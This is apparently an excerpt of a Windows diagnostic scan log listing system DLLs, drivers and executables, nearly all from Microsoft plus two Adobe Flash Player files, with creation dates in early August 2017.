2017-08-08 19:26 - 2017-08-01 03:42 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-08-08 19:26 - 2017-08-01 03:41 - 000130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanagerprecheck.dll
2017-08-08 19:26 - 2017-08-01 03:41 - 000110592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2017-08-08 19:26 - 2017-08-01 03:41 - 000042496 _____ (Microsoft Corporation) C:\WINDOWS\system32\tokenbinding.dll
2017-08-08 19:26 - 2017-08-01 03:40 - 017366528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-08-08 19:26 - 2017-08-01 03:40 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenterprisediagnostics.dll
2017-08-08 19:26 - 2017-08-01 03:39 - 000046592 _____ (Microsoft Corporation) C:\WINDOWS\system32\sscore.dll
2017-08-08 19:26 - 2017-08-01 03:38 - 000153088 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdeploy.dll
2017-08-08 19:26 - 2017-08-01 03:38 - 000143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvcext.dll
2017-08-08 19:26 - 2017-08-01 03:37 - 000582656 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsRouterSvc.dll
2017-08-08 19:26 - 2017-08-01 03:37 - 000433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-08-08 19:26 - 2017-08-01 03:37 - 000255488 _____ (Microsoft Corporation) C:\WINDOWS\system32\scksp.dll
2017-08-08 19:26 - 2017-08-01 03:36 - 023681536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-08-08 19:26 - 2017-08-01 03:35 - 000692736 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2017-08-08 19:26 - 2017-08-01 03:34 - 000805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-08-08 19:26 - 2017-08-01 03:33 - 001269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-08-08 19:26 - 2017-08-01 03:33 - 000315904 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncryptprov.dll
2017-08-08 19:26 - 2017-08-01 03:32 - 007336960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-08-08 19:26 - 2017-08-01 03:32 - 000176640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wersvc.dll
2017-08-08 19:26 - 2017-08-01 03:31 - 012786176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-08-08 19:26 - 2017-08-01 03:31 - 004445696 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-08-08 19:26 - 2017-08-01 03:31 - 001396736 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2017-08-08 19:26 - 2017-08-01 03:30 - 008209920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-08-08 19:26 - 2017-08-01 03:30 - 003377664 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-08-08 19:26 - 2017-08-01 03:30 - 002055168 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-08-08 19:26 - 2017-08-01 03:30 - 001052160 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-08-08 19:26 - 2017-08-01 03:30 - 000303104 _____ (Microsoft Corporation) C:\WINDOWS\system32\srvsvc.dll
2017-08-08 19:26 - 2017-08-01 03:28 - 004730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-08-08 19:26 - 2017-08-01 03:28 - 002516480 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2017-08-08 19:26 - 2017-08-01 03:27 - 001802752 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-08-08 19:26 - 2017-08-01 03:27 - 000574464 _____ (Microsoft Corporation) C:\WINDOWS\system32\configmanager2.dll
2017-08-08 19:26 - 2017-08-01 03:27 - 000482816 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll
2017-08-08 19:26 - 2017-08-01 03:26 - 000323584 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2017-08-08 19:26 - 2017-08-01 03:25 - 000249344 _____ (Microsoft Corporation) C:\WINDOWS\system32\coredpus.dll
2017-08-08 19:26 - 2017-08-01 03:25 - 000194048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmregistration.dll
2017-08-08 19:26 - 2017-08-01 03:25 - 000140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcsps.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000866816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mswdat10.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000641536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mswstr10.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000616448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrepl40.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000518144 _____ C:\WINDOWS\SysWOW64\msjetoledb40.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000475648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxbde40.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000375808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspbde40.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000343552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000339968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msexcl40.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000310272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd2x40.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjtes40.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstext40.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000240640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msltus40.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000144896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjint40.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000083968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjter40.dll
2017-08-08 19:26 - 2017-07-31 17:15 - 000835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-08-08 19:26 - 2017-07-31 17:15 - 000177648 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-08-08 19:26 - 2017-07-28 07:30 - 001068720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-08-08 19:26 - 2017-07-28 07:25 - 002399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-08-08 19:26 - 2017-07-28 07:24 - 002327456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2017-08-08 19:26 - 2017-07-28 07:24 - 000455584 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2017-08-08 19:26 - 2017-07-28 07:24 - 000119904 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcmnutils.dll
2017-08-08 19:26 - 2017-07-28 07:24 - 000116280 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcd.dll
2017-08-08 19:26 - 2017-07-28 07:23 - 002969888 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-08-08 19:26 - 2017-07-28 07:23 - 000723360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpi.sys
2017-08-08 19:26 - 2017-07-28 07:22 - 000923048 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-08-08 19:26 - 2017-07-28 07:20 - 000279968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msiscsi.sys
2017-08-08 19:26 - 2017-07-28 07:17 - 000660680 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2017-08-08 19:26 - 2017-07-28 07:16 - 007326128 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-08-08 19:26 - 2017-07-28 07:16 - 000961952 _____ (Microsoft Corporation) C:\WINDOWS\system32\efscore.dll
2017-08-08 19:26 - 2017-07-28 07:15 - 005302968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2017-08-08 19:26 - 2017-07-28 07:15 - 000872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-08-08 19:26 - 2017-07-28 07:15 - 000715168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys
2017-08-08 19:26 - 2017-07-28 07:15 - 000554400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2017-08-08 19:26 - 2017-07-28 07:14 - 000654976 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2017-08-08 19:26 - 2017-07-28 07:14 - 000318232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininit.exe
2017-08-08 19:26 - 2017-07-28 07:13 - 007907344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-08-08 19:26 - 2017-07-28 07:13 - 006557520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-08-08 19:26 - 2017-07-28 07:13 - 002604248 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2017-08-08 19:26 - 2017-07-28 07:13 - 001054280 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2017-08-08 19:26 - 2017-07-28 07:13 - 001033544 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyDecMFT.dll
2017-08-08 19:26 - 2017-07-28 07:13 - 000192264 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsensorgroup.dll
2017-08-08 19:26 - 2017-07-28 07:13 - 000104432 _____ (Microsoft Corporation) C:\WINDOWS\system32\msacm32.dll
2017-08-08 19:26 - 2017-07-28 07:12 - 021353208 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-08-08 19:26 - 2017-07-28 07:12 - 001337856 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2017-08-08 19:26 - 2017-07-28 07:12 - 001325968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-08-08 19:26 - 2017-07-28 07:12 - 000323936 _____ (Microsoft Corporation) C:\WINDOWS\system32\shlwapi.dll
2017-08-08 19:26 - 2017-07-28 07:10 - 002679200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-08-08 19:26 - 2017-07-28 07:10 - 001114528 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgent.dll
2017-08-08 19:26 - 2017-07-28 07:09 - 000529992 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2017-08-08 19:26 - 2017-07-28 07:09 - 000527976 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe
2017-08-08 19:26 - 2017-07-28 07:09 - 000387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2017-08-08 19:26 - 2017-07-28 07:07 - 000805816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-08-08 19:26 - 2017-07-28 06:48 - 001839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-08-08 19:26 - 2017-07-28 06:48 - 000100232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcd.dll
2017-08-08 19:26 - 2017-07-28 06:48 - 000096648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmcmnutils.dll
2017-08-08 19:26 - 2017-07-28 06:47 - 002259768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-08-08 19:26 - 2017-07-28 06:40 - 005820984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-08-08 19:26 - 2017-07-28 06:40 - 000551200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll
2017-08-08 19:26 - 2017-07-28 06:38 - 004213656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll
2017-08-08 19:26 - 2017-07-28 06:37 - 000519680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2017-08-08 19:26 - 2017-07-28 06:36 - 020373408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-08-08 19:26 - 2017-07-28 06:36 - 006761568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-08-08 19:26 - 2017-07-28 06:36 - 005808640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-08-08 19:26 - 2017-07-28 06:36 - 002424024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2017-08-08 19:26 - 2017-07-28 06:36 - 001195760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioEng.dll
2017-08-08 19:26 - 2017-07-28 06:36 - 000866808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DolbyDecMFT.dll
2017-08-08 19:26 - 2017-07-28 06:36 - 000864248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2017-08-08 19:26 - 2017-07-28 06:36 - 000173104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsensorgroup.dll
2017-08-08 19:26 - 2017-07-28 06:36 - 000090464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msacm32.dll
2017-08-08 19:26 - 2017-07-28 06:35 - 000988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-08-08 19:26 - 2017-07-28 06:35 - 000277432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shlwapi.dll
2017-08-08 19:26 - 2017-07-28 06:33 - 000967584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ReAgent.dll
2017-08-08 19:26 - 2017-07-28 06:33 - 000583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-08-08 19:26 - 2017-07-28 06:33 - 000414296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2017-08-08 19:26 - 2017-07-28 06:31 - 003995136 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbon.dll
2017-08-08 19:26 - 2017-07-28 06:30 - 001722880 _____ (Microsoft Corporation) C:\WINDOWS\system32\dui70.dll
2017-08-08 19:26 - 2017-07-28 06:29 - 000584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-08-08 19:26 - 2017-07-28 06:29 - 000142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmredir.dll
2017-08-08 19:26 - 2017-07-28 06:27 - 000051712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\UcmUcsi.sys
2017-08-08 19:26 - 2017-07-28 06:26 - 000102912 _____ (Microsoft Corporation) C:\WINDOWS\system32\officecsp.dll
2017-08-08 19:26 - 2017-07-28 06:26 - 000094720 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2017-08-08 19:26 - 2017-07-28 06:26 - 000090112 _____ (Microsoft Corporation) C:\WINDOWS\system32\ofdeploy.exe
2017-08-08 19:26 - 2017-07-28 06:26 - 000044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmintegrator.dll
2017-08-08 19:26 - 2017-07-28 06:26 - 000022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\IpNatHlpClient.dll
2017-08-08 19:26 - 2017-07-28 06:25 - 003464704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbon.dll
2017-08-08 19:26 - 2017-07-28 06:25 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyMATEnc.dll
2017-08-08 19:26 - 2017-07-28 06:25 - 000115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys
2017-08-08 19:26 - 2017-07-28 06:25 - 000112640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll
2017-08-08 19:26 - 2017-07-28 06:24 - 000584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2017-08-08 19:26 - 2017-07-28 06:24 - 000184832 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll
2017-08-08 19:26 - 2017-07-28 06:24 - 000136192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryUpgrade.dll
2017-08-08 19:26 - 2017-07-28 06:24 - 000064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-08-08 19:26 - 2017-07-28 06:24 - 000043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmTasks.dll
2017-08-08 19:26 - 2017-07-28 06:23 - 007931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-08-08 19:26 - 2017-07-28 06:23 - 000778240 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyHrtfEnc.dll
2017-08-08 19:26 - 2017-07-28 06:23 - 000189440 _____ (Microsoft Corporation) C:\WINDOWS\system32\BluetoothApis.dll
2017-08-08 19:26 - 2017-07-28 06:22 - 000778240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2017-08-08 19:26 - 2017-07-28 06:22 - 000555008 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll
2017-08-08 19:26 - 2017-07-28 06:22 - 000500224 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.BlueLightReduction.dll
2017-08-08 19:26 - 2017-07-28 06:22 - 000491520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Display.dll
2017-08-08 19:26 - 2017-07-28 06:22 - 000450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2017-08-08 19:26 - 2017-07-28 06:22 - 000259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Flights.dll
2017-08-08 19:26 - 2017-07-28 06:22 - 000209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2017-08-08 19:26 - 2017-07-28 06:22 - 000197120 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdboot.exe
2017-08-08 19:26 - 2017-07-28 06:21 - 008333312 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2017-08-08 19:26 - 2017-07-28 06:21 - 000699904 _____ (Microsoft Corporation) C:\WINDOWS\system32\FlightSettings.dll
2017-08-08 19:26 - 2017-07-28 06:21 - 000527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-08-08 19:26 - 2017-07-28 06:21 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Notifications.dll
2017-08-08 19:26 - 2017-07-28 06:21 - 000165888 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2017-08-08 19:26 - 2017-07-28 06:21 - 000150528 _____ (Microsoft Corporation) C:\WINDOWS\system32\qasf.dll
2017-08-08 19:26 - 2017-07-28 06:21 - 000029184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cmintegrator.dll
2017-08-08 19:26 - 2017-07-28 06:20 - 001015296 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll
2017-08-08 19:26 - 2017-07-28 06:20 - 000524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-08-08 19:26 - 2017-07-28 06:20 - 000079872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2017-08-08 19:26 - 2017-07-28 06:20 - 000018432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IpNatHlpClient.dll
2017-08-08 19:26 - 2017-07-28 06:19 - 001878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-08-08 19:26 - 2017-07-28 06:19 - 000942592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2017-08-08 19:26 - 2017-07-28 06:19 - 000847360 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2017-08-08 19:26 - 2017-07-28 06:19 - 000817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2017-08-08 19:26 - 2017-07-28 06:19 - 000687616 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-08-08 19:26 - 2017-07-28 06:19 - 000566784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.UX.EapRequestHandler.dll
2017-08-08 19:26 - 2017-07-28 06:19 - 000417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-08-08 19:26 - 2017-07-28 06:19 - 000412160 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2017-08-08 19:26 - 2017-07-28 06:19 - 000370688 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastlsext.dll
2017-08-08 19:26 - 2017-07-28 06:19 - 000229376 _____ (Microsoft Corporation) C:\WINDOWS\system32\SIHClient.exe
2017-08-08 19:26 - 2017-07-28 06:19 - 000147456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VCardParser.dll
2017-08-08 19:26 - 2017-07-28 06:19 - 000117760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryUpgrade.dll
2017-08-08 19:26 - 2017-07-28 06:18 - 001468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-08-08 19:26 - 2017-07-28 06:18 - 001298432 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpasvc.dll
2017-08-08 19:26 - 2017-07-28 06:18 - 001260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-08-08 19:26 - 2017-07-28 06:18 - 000925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-08-08 19:26 - 2017-07-28 06:18 - 000777216 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2017-08-08 19:26 - 2017-07-28 06:18 - 000586240 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2017-08-08 19:26 - 2017-07-28 06:18 - 000536064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2017-08-08 19:26 - 2017-07-28 06:18 - 000139776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BluetoothApis.dll
2017-08-08 19:26 - 2017-07-28 06:17 - 006728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-08-08 19:26 - 2017-07-28 06:17 - 002805248 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-08-08 19:26 - 2017-07-28 06:17 - 001886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-08-08 19:26 - 2017-07-28 06:17 - 000770048 _____ (Microsoft Corporation) C:\WINDOWS\system32\PCPKsp.dll
2017-08-08 19:26 - 2017-07-28 06:17 - 000497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll
2017-08-08 19:26 - 2017-07-28 06:17 - 000420864 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll
2017-08-08 19:26 - 2017-07-28 06:16 - 001291776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-08-08 19:26 - 2017-07-28 06:16 - 001046016 _____ (Microsoft Corporation) C:\WINDOWS\system32\comdlg32.dll
2017-08-08 19:26 - 2017-07-28 06:16 - 000470016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll
2017-08-08 19:26 - 2017-07-28 06:16 - 000383488 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-08-08 19:26 - 2017-07-28 06:16 - 000135680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\qasf.dll
2017-08-08 19:26 - 2017-07-28 06:15 - 005721600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2017-08-08 19:26 - 2017-07-28 06:15 - 003204608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.dll
2017-08-08 19:26 - 2017-07-28 06:15 - 000986112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2017-08-08 19:26 - 2017-07-28 06:15 - 000612864 _____ (Microsoft Corporation) C:\WINDOWS\system32\shsvcs.dll
2017-08-08 19:26 - 2017-07-28 06:15 - 000586752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Web.Core.dll
2017-08-08 19:26 - 2017-07-28 06:14 - 004396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-08-08 19:26 - 2017-07-28 06:14 - 001305088 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-08-08 19:26 - 2017-07-28 06:14 - 000368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-08-08 19:26 - 2017-07-28 06:14 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll
2017-08-08 19:26 - 2017-07-28 06:14 - 000331264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastlsext.dll
2017-08-08 19:26 - 2017-07-28 06:13 - 004535296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2017-08-08 19:26 - 2017-07-28 06:13 - 001293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-08-08 19:26 - 2017-07-28 06:13 - 000972288 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2017-08-08 19:26 - 2017-07-28 06:13 - 000932352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GamePanel.exe
2017-08-08 19:26 - 2017-07-28 06:13 - 000809984 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll
2017-08-08 19:26 - 2017-07-28 06:13 - 000665600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2017-08-08 19:26 - 2017-07-28 06:13 - 000636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-08-08 19:26 - 2017-07-28 06:12 - 005557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-08-08 19:26 - 2017-07-28 06:12 - 004707840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2017-08-08 19:26 - 2017-07-28 06:12 - 002939392 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2017-08-08 19:26 - 2017-07-28 06:12 - 002444288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-08-08 19:26 - 2017-07-28 06:12 - 000952832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll
2017-08-08 19:26 - 2017-07-28 06:12 - 000587776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PCPKsp.dll
2017-08-08 19:26 - 2017-07-28 06:12 - 000446464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastls.dll
2017-08-08 19:26 - 2017-07-28 06:12 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2017-08-08 19:26 - 2017-07-28 06:12 - 000337920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-08-08 19:26 - 2017-07-28 06:11 - 003667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-08-08 19:26 - 2017-07-28 06:11 - 001357312 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-08-08 19:26 - 2017-07-28 06:11 - 001248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-08-08 19:26 - 2017-07-28 06:10 - 001706496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2017-08-08 19:26 - 2017-07-28 06:10 - 001019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-08-08 19:26 - 2017-07-28 06:10 - 000787456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2017-08-08 19:26 - 2017-07-28 06:10 - 000625152 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-08-08 19:26 - 2017-07-28 06:10 - 000564224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shsvcs.dll
